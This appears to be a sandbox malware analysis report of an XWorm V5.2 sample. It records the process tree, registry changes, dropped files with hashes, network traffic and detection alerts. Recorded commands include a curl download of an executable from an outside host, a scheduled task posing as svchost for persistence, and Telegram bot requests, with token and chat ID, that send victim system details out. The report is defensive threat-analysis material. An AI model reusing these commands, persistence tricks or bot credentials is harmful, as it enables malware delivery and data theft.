Drop incoming updateshttps://api.telegram.org/bot7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
End-PointsendMessage
Args
chat_id (1)6434827273
Token7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
End-PointsendMessage
Args
chat_id (1)6434827273
text (1)☠ [XWorm V5.2] New Clinet : 3C54740F7CC0F23B53E5 UserName : admin OSFullName : Microsoft Windows 10
Token7559403648:AAFPNbAaVnBOwFNO3otTODINqrViE0ZUmRU
End-PointsendMessage
Args
chat_id (1)6434827273
text (1)☠ [XWorm V5.2] New Clinet : 3C54740F7CC0F23B53E5 UserName : admin OSFullName : Microsoft Windows 10 Pro USB : False CPU : Intel i5-6400 @ 2.70GHz GPU : Microsoft Basic Display Adapter RAM : 3.99 GB Groub : expen HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Telegram-Responses
oktrue
result
message_id587
from
id7559403648
is_bottrue
first_name[ Meow-Team ]
usernameqwq123qwdaff_bot
chat
id6434827273
first_name>.<
usernamerecafking
typeprivate
date1734166874
text☠ [XWorm V5.2] New Clinet : 3C54740F7CC0F23B53E5 UserName : admin OSFullName : Microsoft Windows 10 Pro USB : False CPU : Intel i5-6400 @ 2.70GHz GPU : Microsoft Basic Display Adapter RAM : 3.99 GB Groub : expen
6376timeout /t 5 C:\Windows\System32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
7164curl -o lJL.exe https://envs.sh/lJL.exeC:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
5628"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"C:\Windows\System32\schtasks.exelJA.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5920\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeschtasks.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
123 797
Read events
123 759
Write events
30
Delete events
8

Modification events

(PID) Process:(6368) lJA.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJA_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6368) lJA.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJA_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6368) lJA.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJA_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(6368) lJA.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJA_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(6368) lJA.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJA_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(6368) lJA.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJA_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(6368) lJA.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJA_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(6368) lJA.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJA_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6368) lJA.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJA_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6368) lJA.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\lJA_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
78
Suspicious files
32
Text files
105
Unknown types
0

Dropped files

PID
Process
Filename
Type
828lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI8282\_hashlib.pydexecutable
MD5:D6F123C4453230743ADCC06211236BC0
SHA256:7A904FA6618157C34E24AAAC33FDF84035215D82C08EEC6983C165A49D785DC9
828lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI8282\_decimal.pydexecutable
MD5:21D27C95493C701DFF0206FF5F03941D
SHA256:38EC7A3C2F368FFEB94524D7C66250C0D2DAFE58121E93E54B17C114058EA877
828lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI8282\rar.exeexecutable
MD5:9C223575AE5B9544BC3D69AC6364F75E
SHA256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
6292curl.exeC:\Users\admin\Desktop\lJA.exeexecutable
MD5:9098764438548C826E3B97EAD4FD86A1
SHA256:7D001DD3647B07E2F87A9116613CBF8FD5C2701E872D4F1ECCE06EEC861A94CF
6368lJA.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkbinary
MD5:965A5DEB9669ACF03D0C9432807613D6
SHA256:8A4A65A70804E08885E973EFAE65CD54625D9F521E1FCAF664F6440080747E26
828lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI8282\_queue.pydexecutable
MD5:513DCE65C09B3ABC516687F99A6971D8
SHA256:D4BE41574C3E17792A25793E6F5BF171BAEEB4255C08CB6A5CD7705A91E896FC
828lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI8282\_ctypes.pydexecutable
MD5:79879C679A12FAC03F472463BB8CEFF7
SHA256:8D1A21192112E13913CB77708C105034C5F251D64517017975AF8E0C4999EBA3
828lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI8282\_bz2.pydexecutable
MD5:58FC4C56F7F400DE210E98CCB8FDC4B2
SHA256:DFC195EBB59DC5E365EFD3853D72897B8838497E15C0977B6EDB1EB347F13150
828lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI8282\_lzma.pydexecutable
MD5:055EB9D91C42BB228A72BF5B7B77C0C8
SHA256:DE342275A648207BEF9B9662C9829AF222B160975AD8925CC5612CD0F182414E
828lJL.exeC:\Users\admin\AppData\Local\Temp\_MEI8282\_sqlite3.pydexecutable
MD5:8CD40257514A16060D5D882788855B55
SHA256:7D53DF36EE9DA2DF36C2676CFAEA84EE87E7E2A15AD8123F6ABB48717C3BC891
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
59
DNS requests
32
Threats
21

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6380
lJL.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
shared
6368
lJA.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
shared
6496
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
7192
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6380
lJL.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/?fields=225545
unknown
shared
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7192
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4712
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4328
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
6292
curl.exe
89.163.145.170:443
envs.sh
myLoc managed IT AG
DE
unknown
4
System
192.168.100.255:138
whitelisted
5064
SearchApp.exe
104.126.37.153:443
www.bing.com
Akamai International B.V.
DE
whitelisted
1176
svchost.exe
20.190.159.64:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
  • 52.167.249.196
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 95.101.149.131
whitelisted
google.com
  • 216.58.212.142
whitelisted
envs.sh
  • 89.163.145.170
unknown
www.bing.com
  • 104.126.37.153
  • 104.126.37.162
  • 104.126.37.170
  • 104.126.37.171
  • 104.126.37.144
  • 104.126.37.163
  • 104.126.37.145
  • 104.126.37.168
  • 104.126.37.152
whitelisted
login.live.com
  • 20.190.159.64
  • 20.190.159.73
  • 20.190.159.2
  • 40.126.31.69
  • 40.126.31.73
  • 20.190.159.4
  • 20.190.159.0
  • 20.190.159.68
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
ip-api.com
  • 208.95.112.1
shared
go.microsoft.com
  • 23.218.210.69
whitelisted

Threats

PID
Process
Class
Message
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
Device Retrieving External IP Address Detected
POLICY [ANY.RUN] External Hosting Lookup by ip-api
Not Suspicious Traffic
INFO [ANY.RUN] Online Pastebin Text Storage
Misc activity
SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
Misc activity
ET HUNTING Telegram API Certificate Observed
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
No debug info